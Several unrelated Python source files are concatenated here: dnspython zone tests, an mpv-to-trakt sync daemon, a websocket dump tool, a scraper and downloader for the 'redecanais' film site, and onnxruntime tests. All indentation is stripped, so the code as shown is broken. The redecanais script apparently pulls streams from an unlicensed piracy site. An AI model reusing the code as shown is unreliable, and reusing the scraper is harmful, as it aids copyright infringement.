dns.name.empty, dns.rdatatype.SOA, dns.rdatatype.NONE
)
assert rdataset[0].serial == 1000
with pytest.raises(ValueError):
vzone.set_max_versions(0)
# for debugging if needed
def _dump(zone):
for v in zone._versions:
print("VERSION", v.id)
for (name, n) in v.nodes.items():
for rdataset in n:
print(rdataset.to_text(name))
def test_vzone_open_txn_pins_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.reader(id=2) as txn:
vzone.set_max_versions(1)
with vzone.reader(id=3) as txn:
rdataset = txn.get("@", "soa")
assert rdataset[0].serial == 2
assert len(vzone._versions) == 4
assert len(vzone._versions) == 1
rdataset = vzone.find_rdataset("@", "soa")
assert vzone._versions[0].id == 5
assert rdataset[0].serial == 4
try:
import threading
one_got_lock = threading.Event()
def run_one(zone):
with zone.writer() as txn:
one_got_lock.set()
# wait until two blocks
while len(zone._write_waiters) == 0:
time.sleep(0.01)
rds = dns.rdataset.from_text("in", "a", 300, "10.0.0.98")
txn.add("a98", rds)
def run_two(zone):
# wait until one has the lock so we know we will block if we
# get the call done before the sleep in one completes
one_got_lock.wait()
with zone.writer() as txn:
rds = dns.rdataset.from_text("in", "a", 300, "10.0.0.99")
txn.add("a99", rds)
def test_vzone_concurrency(vzone):
t1 = threading.Thread(target=run_one, args=(vzone,))
t1.start()
t2 = threading.Thread(target=run_two, args=(vzone,))
t2.start()
t1.join()
t2.join()
with vzone.reader() as txn:
assert txn.name_exists("a98")
assert txn.name_exists("a99")
except ImportError: # pragma: no cover
pass
|
sync_daemon.py
|
#!/usr/bin/env python3
import json
import logging
import sys
import threading
import time
import urllib.parse
import guessit
import os
import requests
import mpv
import trakt_key_holder
import trakt_v2_oauth
log = logging.getLogger('mpvTraktSync')
TRAKT_ID_CACHE_JSON = 'trakt_ids.json'
config = None
last_is_paused = None
last_playback_position = None
last_working_dir = None
last_path = None
last_duration = None
last_file_start_timestamp = None
is_local_state_dirty = True
next_sync_timer = None
next_regular_timer = None
def on_command_response(monitor, command, response):
log.debug('on_command_response(%s, %s)' % (command, response))
global last_is_paused, last_playback_position, last_working_dir, last_path, last_duration, last_file_start_timestamp
global next_sync_timer
last_command_elements = command['command']
if last_command_elements[0] == 'get_property':
if response['error'] != 'success':
log.warning('Command %s failed: %s', command, response)
else:
if last_command_elements[1] == 'pause':
last_is_paused = response['data']
if not last_is_paused and last_file_start_timestamp is None:
last_file_start_timestamp = time.time()
elif last_command_elements[1] == 'percent-pos':
last_playback_position = response['data']
elif last_command_elements[1] == 'working-directory':
last_working_dir = response['data']
elif last_command_elements[1] == 'path':
last_path = response['data']
elif last_command_elements[1] == 'duration':
last_duration = response['data']
log.debug('is_local_state_dirty: %s\nlast_is_paused: %s\nlast_playback_position: %s\nlast_working_dir: %s\nlast_path: %s\nlast_duration: %s',
is_local_state_dirty, last_is_paused, last_playback_position, last_working_dir, last_path, last_duration)
if is_local_state_dirty \
and last_is_paused is not None \
and last_playback_position is not None \
and last_working_dir is not None \
and last_path is not None \
and last_duration is not None:
if next_sync_timer is not None:
next_sync_timer.cancel()
next_sync_timer = threading.Timer(config['seconds_between_mpv_event_and_trakt_sync'], sync_to_trakt,
(last_is_paused, last_playback_position, last_working_dir, last_path,
last_duration, last_file_start_timestamp, False))
next_sync_timer.start()
def on_event(monitor, event):
log.debug('on_event(%s)' % (event))
event_name = event['event']
# when a new file starts, act as if a new mpv instance got connected
if event_name == 'start-file':
on_disconnected()
on_connected(monitor)
elif event_name == 'pause' or event_name == 'unpause' or event_name == 'seek':
global is_local_state_dirty
is_local_state_dirty = True
issue_scrobble_commands(monitor)
def on_connected(monitor):
log.debug('on_connected()')
global is_local_state_dirty
is_local_state_dirty = True
issue_scrobble_commands(monitor)
def on_disconnected():
log.debug('on_disconnected()')
global last_is_paused, last_playback_position, last_working_dir, last_path, last_duration, last_file_start_timestamp
global next_sync_timer, next_regular_timer
global is_local_state_dirty
if next_sync_timer is not None:
next_sync_timer.cancel()
if next_regular_timer is not None:
next_regular_timer.cancel()
if last_is_paused is not None \
and last_playback_position is not None \
and last_working_dir is not None \
and last_path is not None \
and last_duration is not None:
threading.Thread(target=sync_to_trakt, args=(
last_is_paused, last_playback_position, last_working_dir, last_path, last_duration,
last_file_start_timestamp, True)).start()
last_is_paused = None
last_playback_position = None
last_working_dir = None
last_path = None
last_duration = None
last_file_start_timestamp = None
is_local_state_dirty = True
def issue_scrobble_commands(monitor):
monitor.send_get_property_command('working-directory')
monitor.send_get_property_command('path')
monitor.send_get_property_command('percent-pos')
monitor.send_get_property_command('pause')
monitor.send_get_property_command('duration')
schedule_regular_timer(monitor)
def schedule_regular_timer(monitor):
global next_regular_timer
if next_regular_timer is not None:
next_regular_timer.cancel()
next_regular_timer = threading.Timer(config['seconds_between_regular_get_property_commands'],
issue_scrobble_commands, [monitor])
next_regular_timer.start()
def is_finished(playback_position, duration, start_time):
if start_time is not None:
watch_time = time.time() - start_time
# only consider a session finished if
# at least a minimal playback position is reached
# and
# the session is running long enough
if playback_position >= config['percent_minimal_playback_position_before_scrobble'] \
and watch_time >= duration * config['factor_must_watch_before_scrobble']:
return True
return False
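# Worked example of the is_finished() rule above (hypothetical numbers, not taken from
# config.json): with percent_minimal_playback_position_before_scrobble = 80 and
# factor_must_watch_before_scrobble = 0.5, a 3600 s film watched for 2000 s of wall-clock
# time and currently at 92 % playback position counts as finished, because 92 >= 80 and
# 2000 >= 3600 * 0.5; stopping at 40 % after 600 s fails both checks.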
def is_url(url):
try:
return urllib.parse.urlparse(url).scheme != ''
except SyntaxError:
return False
def sync_to_trakt(is_paused, playback_position, working_dir, path, duration, start_time, mpv_closed):
log.debug('sync_to_trakt(%s, %s, %s, %s, %s, %s, %s)' % (is_paused, playback_position, working_dir, path, duration, start_time, mpv_closed))
do_sync = False
if not is_url(path) and not os.path.isabs(path):
# If mpv is started from a terminal rather than via a double click in a file manager,
# the path to the video file may be relative instead of absolute. The monitored_directories
# check below needs an absolute path, which is why the working directory is joined in here.
path = os.path.join(working_dir, path)
for monitored_directory in config['monitored_directories']:
if path.startswith(monitored_directory):
do_sync = True
break
# empty monitored_directories means: always sync
if len(config['monitored_directories']) == 0:
do_sync = True
for excluded_directory in config['excluded_directories']:
if path.startswith(excluded_directory):
do_sync = False
break
log.debug('do_sync = %s' % (do_sync))
if do_sync:
guess = guessit.guessit(path)
log.debug(guess)
data = get_cached_trakt_data(guess)
if data is not None:
data['progress'] = playback_position
data['app_version'] = '1.0.3'
finished = is_finished(playback_position, duration, start_time)
# closed finished paused trakt action
# False False False start
# False False True pause
# False True False start
# False True True pause
# True False False pause
# True False True pause
# True True False stop
# True True True stop
# is equal to:
if mpv_closed:
if finished:
# mpv is closing and the user finished watching
# trakt action: stop
url = 'https://api.trakt.tv/scrobble/stop'
else:
# closed before finished watching
# trakt action: pause
url = 'https://api.trakt.tv/scrobble/pause'
elif is_paused:
# paused, while still open
# trakt action: pause
url = 'https://api.trakt.tv/scrobble/pause'
else:
# watching right now
# trakt action: start
url = 'https://api.trakt.tv/scrobble/start'
req = requests.post(url,
json=data,
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id(),
'Authorization': 'Bearer ' + trakt_v2_oauth.get_access_token()})
log.info('%s %s %s', url, req.status_code, req.text)
if 200 <= req.status_code < 300:
global is_local_state_dirty
is_local_state_dirty = False
def choose_trakt_id(data, guess):
if guess['type'] == 'episode':
kind = 'show'
else:
kind = 'movie'
# the first returned result of the matching kind whose year agrees with the guess is the most likely true match
if 'year' in guess:
for item in data:
if item['type'] == kind:
if item[kind]['year'] == guess['year']:
return item[kind]['ids']['trakt']
else:
return data[0][kind]['ids']['trakt']
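# For reference: choose_trakt_id() receives the list returned by the trakt /search
# endpoint, whose items (judging by the field accesses above, not the API docs) look
# roughly like {'type': 'show', 'show': {'title': ..., 'year': ..., 'ids': {'trakt': ...}}}
# or the equivalent shape keyed by 'movie'.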
def get_cached_trakt_data(guess):
# load cached ids
if os.path.isfile(TRAKT_ID_CACHE_JSON):
with open(TRAKT_ID_CACHE_JSON) as file:
id_cache = json.load(file)
else:
id_cache = {
'movies': {},
'shows': {}
}
# constructing data to be sent to trakt
# if show or movie name is not found in id_cache, request trakt id from trakt API and cache it.
# then assign dict to data, which has the structure of the json trakt expects for a scrobble call
data = None
if guess['type'] == 'episode':
log.debug(guess)
if 'episode' not in guess and 'episode_title' in guess:
guess['episode'] = guess['episode_title']
if guess['title'].lower() not in id_cache['shows']:
log.info('requesting trakt id for show ' + guess['title'])
req = requests.get('https://api.trakt.tv/search/show?field=title&query=' + guess['title'],
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id()})
if 200 <= req.status_code < 300 and len(req.json()) > 0:
trakt_id = choose_trakt_id(req.json(), guess)
else:
# write n/a into cache, so that unknown shows are only requested once.
# without n/a, unknown shows would be requested each time get_cached_trakt_data() is called
trakt_id = 'n/a'
log.warning('trakt request failed or unknown show ' + str(guess))
id_cache['shows'][guess['title'].lower()] = trakt_id
trakt_id = id_cache['shows'][guess['title'].lower()]
if trakt_id != 'n/a':
data = {'show': {'ids': {'trakt': id_cache['shows'][guess['title'].lower()]}},
'episode': {'season': guess['season'], 'number': guess['episode']}}
elif guess['type'] == 'movie':
if guess['title'].lower() not in id_cache['movies']:
log.info('requesting trakt id for movie ' + guess['title'])
req = requests.get('https://api.trakt.tv/search/movie?field=title&query=' + guess['title'],
headers={'trakt-api-version': '2', 'trakt-api-key': trakt_key_holder.get_id()})
if 200 <= req.status_code < 300 and len(req.json()) > 0:
trakt_id = choose_trakt_id(req.json(), guess)
else:
# write n/a into cache, so that unknown movies are only requested once.
# without n/a, unknown movies would be requested each time get_cached_trakt_data() is called
trakt_id = 'n/a'
log.warning('trakt request failed or unknown movie ' + str(guess))
id_cache['movies'][guess['title'].lower()] = trakt_id
trakt_id = id_cache['movies'][guess['title'].lower()]
if trakt_id != 'n/a':
data = {'movie': {'ids': {'trakt': id_cache['movies'][guess['title'].lower()]}}}
else:
log.warning('Unknown guessit type ' + str(guess))
# update cached ids file
with open(TRAKT_ID_CACHE_JSON, mode='w') as file:
json.dump(id_cache, file)
return data
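# Sketch of the cache file written to TRAKT_ID_CACHE_JSON, as implied by the lookups
# above (titles are lower-cased keys, values are trakt ids, 'n/a' marks failed lookups so
# they are not retried); the titles and ids below are purely illustrative:
# {"shows": {"some show": 1390, "unknown show": "n/a"}, "movies": {"some movie": 481}}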
def main():
log.info('launched')
with open('config.json') as file:
global config
config = json.load(file)
monitor = mpv.MpvMonitor.create(on_connected, on_event, on_command_response, on_disconnected)
try:
trakt_v2_oauth.get_access_token() # prompts authentication, if necessary
while True:
if monitor.can_open():
# call monitor.run() as a daemon thread, so that all SIGTERMs are handled here
# Daemon threads die automatically, when the main process ends
thread = threading.Thread(target=monitor.run, daemon=True)
thread.start()
thread.join()
# If thread joins, mpv was closed.
log.info('mpv closed')
else:
# mpv not open
# sleep before next attempt
time.sleep(config['seconds_between_mpv_running_checks'])
except KeyboardInterrupt:
log.info('terminating')
logging.shutdown()
def register_exception_handler():
def error_catcher(*exc_info):
log.critical("Unhandled exception", exc_info=exc_info)
sys.excepthook = error_catcher
# from http://stackoverflow.com/a/31622038
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
if __name__ == '__main__':
import logging.config
logging.config.fileConfig('log.conf')
register_exception_handler()
main()
|
wsdump.py
|
#!/home/chuck/Desktop/Projects/Kube-Automate/venv/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213':  # gzip magic bytes
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except Exception:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except Exception:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
redecanais.py
|
# -*- coding: utf-8 -*-
#
import re
import time
import shutil
import webbrowser
import http.server
import socketserver
import threading
import requests
from bs4 import BeautifulSoup
BASE_URL = 'https://redecanais.rocks'
class SimpleServerHttp:
handler = http.server.SimpleHTTPRequestHandler
def __init__(self):
print('initializing...')
self.server = socketserver.TCPServer(("", 9090), self.handler)
print("Serving at port", 9090)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
def start(self):
self.server_thread.start()
def stop(self):
self.server.shutdown()
self.server.server_close()
class Browser:
def __init__(self):
self.request = None
self.response = None
def headers(self):
headers = {
'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36',
}
return headers
def open(self, url, referer=None):
if referer:
headers = self.headers()
headers['referer'] = referer
else:
headers = self.headers()
with requests.session() as s:
self.request = s.get(url, headers=headers)
self.response = self.request.text
return self.response
class ChannelsNetwork(Browser):
def __init__(self):
super().__init__()
def search(self):
film_name = input('Digite o nome do filme que deseja assistir: ')
url_search = f'{BASE_URL}/search.php?keywords={film_name}'
return self.films_per_genre(url_search)
def films(self, url, category, page=None):
if type(category) is dict:
list_category = ['legendado', 'dublado', 'nacional']
if 'ficcao' in category['genre']:
genre = category['genre'] + '-filmes'
else:
genre = category['genre'].capitalize() + '-Filmes'
if category['category'] in list_category:
info_category = self.categories(url, category['category'].capitalize() + ' ')[0]
pages = re.compile(r'videos-(.*?)-date').findall(info_category['url'])[0]
if category['category'] == 'dublado':
print(BASE_URL + info_category['url'].replace('filmes-dublado', genre).replace(pages, str(category['page']) + '-date'))
url_category_films = BASE_URL + info_category['url'].replace('filmes-dublado', genre).replace(pages, str(category['page']) + '-date')
return self.films_per_genre(url_category_films)
else:
print(BASE_URL + info_category['url'].replace('filmes-' + category['category'], genre + category['category'].capitalize()).replace(pages, str(category['page']) + '-date'))
url_category_films = BASE_URL + info_category['url'].replace('filmes-' + category['category'], genre + '-' + category['category'].capitalize()).replace(pages, str(category['page']) + '-date')
return self.films_per_genre(url_category_films)
else:
info_category = self.categories(url, category['category'].capitalize() + ' ')[0]
pages = re.compile(r'videos(.*?)date').findall(info_category['url'])[0]
url_category_films = BASE_URL + info_category['url'].replace(pages, '-' + str(page) + '-')
print(url_category_films)
return self.films_per_category(url_category_films)
else:
info_category = self.categories(url, category.capitalize() + ' ')[0]
pages = re.compile(r'videos(.*?)date').findall(info_category['url'])[0]
url_category_films = BASE_URL + info_category['url'].replace(pages, '-' + str(page) + '-')
print(url_category_films)
return self.films_per_category(url_category_films)
def films_per_category(self, url):
html = self.open(url)
soup = BeautifulSoup(html, 'html.parser')
tags = soup.find('ul', {'class': 'row pm-ul-browse-videos list-unstyled'})
films = tags.find_all('div', {'class': 'pm-video-thumb'})
films_list = []
for info in films:
result = info.find_all('a')[1]
dict_films = {'title': result.img['alt'], 'url': BASE_URL + result['href'], 'img': result.img['data-echo']}
films_list.append(dict_films)
return films_list
def films_per_genre(self, url, category=None, genre=None):
url_genre = url
html = self.open(url_genre)
soup = BeautifulSoup(html, 'html.parser')
tags = soup.find('ul', {'class': 'row pm-ul-browse-videos list-unstyled'})
films = tags.find_all('div', {'class': 'pm-video-thumb'})
films_list = []
for info in films:
result = info.find_all('a')[1]
dict_films = {'title': result.img['alt'], 'url': BASE_URL + result['href'], 'img': result.img['data-echo']}
films_list.append(dict_films)
return films_list
def categories(self, url, category=None):
html = self.open(url)
soup = BeautifulSoup(html, 'html.parser')
tags = soup.find_all('li', {'class': 'dropdown-submenu'})[0]
tags.ul.unwrap()
new_html = str(tags).replace('dropdown-submenu', '').replace('</a>\n', '</a> </li>')
new_soup = BeautifulSoup(new_html, 'html.parser')
new_tags = new_soup.find_all('li')
category_list = []
for info in new_tags:
if category is not None:
if category == info.text:
category_dict = {'category': info.text, 'url': info.a['href']}
category_list.append(category_dict)
else:
category_dict = {'category': info.text, 'url': info.a['href']}
category_list.append(category_dict)
return category_list
def get_player(self, url):
html = self.open(url)
iframe = BeautifulSoup(html, 'html.parser')
url_player = iframe.find('div', {'id': 'video-wrapper'}).iframe['src']
url_player_dict = {'embed': url_player, 'player': url_player.replace('.php', 'playerfree.php')}
return url_player_dict
def get_stream(self, url, referer):
html = self.open(url, referer)
source = BeautifulSoup(html, 'html.parser')
url_stream = source.find('div', {'id': 'instructions'}).source['src']
return url_stream
def download(self, url):
filename = url.split('/')[-1].replace('?attachment=true', '')
print('Downloading...' + filename)
with requests.get(url, stream=True) as r:
with open(filename, 'wb') as f:
shutil.copyfileobj(r.raw, f)
def select_film(self, films):
print('\n')
for index, film in enumerate(films):
print(str(index) + ' == ' + film['title'])
print('\n')
selected = int(input('Digite o número correspondente ao filme que deseja assistir: '))
print(films[selected]['url'])
filme = films[selected]['url']
title = films[selected]['title']
img = films[selected]['img']
player_url = self.get_player(filme)
video_url = self.get_stream(url=player_url['player'], referer=player_url['embed'])
print(video_url)
self.play(video_url, title, img)
return
def play(self, url, title=None, img=None):
html_player = """
<!DOCTYPE html>
<html lang="en">
<style>
.container {
width: 100vw;
height: 100vh;
background: #6C7A89;
display: flex;
flex-direction: row;
justify-content: center;
align-items: center
}
.title {
text-align: center;
}
.google-cast-launcher {
float: right;
margin: -55px 200px 14px 0px;
width: 40px;
height: 32px;
opacity: 0.7;
background-color: #000;
border: none;
outline: none;
}
.google-cast-launcher:hover {
--disconnected-color: white;
--connected-color: white;
}
body {
margin: 0px;
}
</style>
<head>
<meta charset="UTF-8">
<title>afterglow player</title>
<script rel="stylesheet" src="https://www.gstatic.com/cv/js/sender/v1/cast_sender.js?loadCastFramework=1" type="text/javascript"></script>
<script rel="stylesheet" src="https://fenny.github.io/ChromecastJS/chromecastjs.js" type="text/javascript"></script>
<script rel="stylesheet" src="https://cdn.jsdelivr.net/afterglow/latest/afterglow.min.js" type="text/javascript"></script>
</head>
<body>
<div class="title">
<h3>RedeCanais Player With Python Backend</h3>
</div>
<div class="container">
<div>
<video class="afterglow" id="myvideo" controls width="1080" height="500" autoplay="autoplay" src="%(url)s"></video>
<button class="google-cast-launcher" is="google-cast-button"></button>
</div>
</div>
</body>
<script>
let cc = new ChromecastJS();
cc.on('available', function() {
cc.cast({
content: '%(url)s',
poster: '%(img)s',
title: '%(title)s',
description: 'Filme'
})
})
</script>
</html>
"""
dict_details = {"url": url,
"title": title,
"img": img
}
with open('player.html', 'w') as f:
f.write(html_player % dict_details)
simple_server = SimpleServerHttp()
simple_server.start()
webbrowser.open('http://localhost:9090/player.html')
print('Starting video')
time.sleep(360)
simple_server.stop()
return
if __name__ == '__main__':
rede = ChannelsNetwork()
#categorias = rede.categories(BASE_URL + '/browse.html')
#print(categorias)
#filmes = rede.films(BASE_URL + '/browse.html', category='filmes 2018', page=3)
#search_film = rede.search()
#print(search_film)
filmes = rede.films(BASE_URL, category={'category': 'dublado', 'genre': 'terror', 'page': 1})
#print(filmes)
"""print('\n')
for index, film in enumerate(filmes):
print(str(index) + ' == ' + film['title'])
print('\n')
select = int(input('Digite o número correspondente ao filme que deseja assistir: '))
print(filmes[select]['url'])
filme = filmes[select]['url']
player_url = rede.get_player(filme)
video_url = rede.get_stream(url=player_url['player'], referer=player_url['embed'])
print(video_url)
rede.play(video_url)
"""
#player_url = rede.get_player('https://redecanais.rocks/doutor-estranho-dublado-2016-1080p_55218911d.html')
#print(player_url)
#video_url = rede.get_stream(url='https://cometa.top/player3/serverfplayerfree.php?vid=VNGDRSULTMTO4K', referer='https://cometa.top/player3/serverf.php?vid=VNGDRSULTMTO4K')
#video_url = rede.get_stream(url=player_url['player'], referer=player_url['embed'])
#print(video_url)
#search_film = rede.search()
#print(search_film)
#rede.download(video_url)
#rede.play(video_url)
select_film = rede.select_film(filmes)
|
onnxruntime_test_python.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
import sys
from helper import get_name
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
import sys
import ctypes
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
option1 = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option1])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
option2 = {'device_id': -1}
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option2])
sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# test get/set of "cuda_mem_limit" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('cuda_mem_limit' in option)
ori_mem_limit = option['cuda_mem_limit']
new_mem_limit = int(ori_mem_limit) // 2
option['cuda_mem_limit'] = new_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], str(new_mem_limit))
option['cuda_mem_limit'] = ori_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], ori_mem_limit)
# test get/set of "arena_extend_strategy" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('arena_extend_strategy' in option)
for strategy in ['kNextPowerOfTwo', 'kSameAsRequested']:
option['arena_extend_strategy'] = strategy
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['arena_extend_strategy'], strategy)
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option['arena_extend_strategy'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
option = {'device_id': i}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
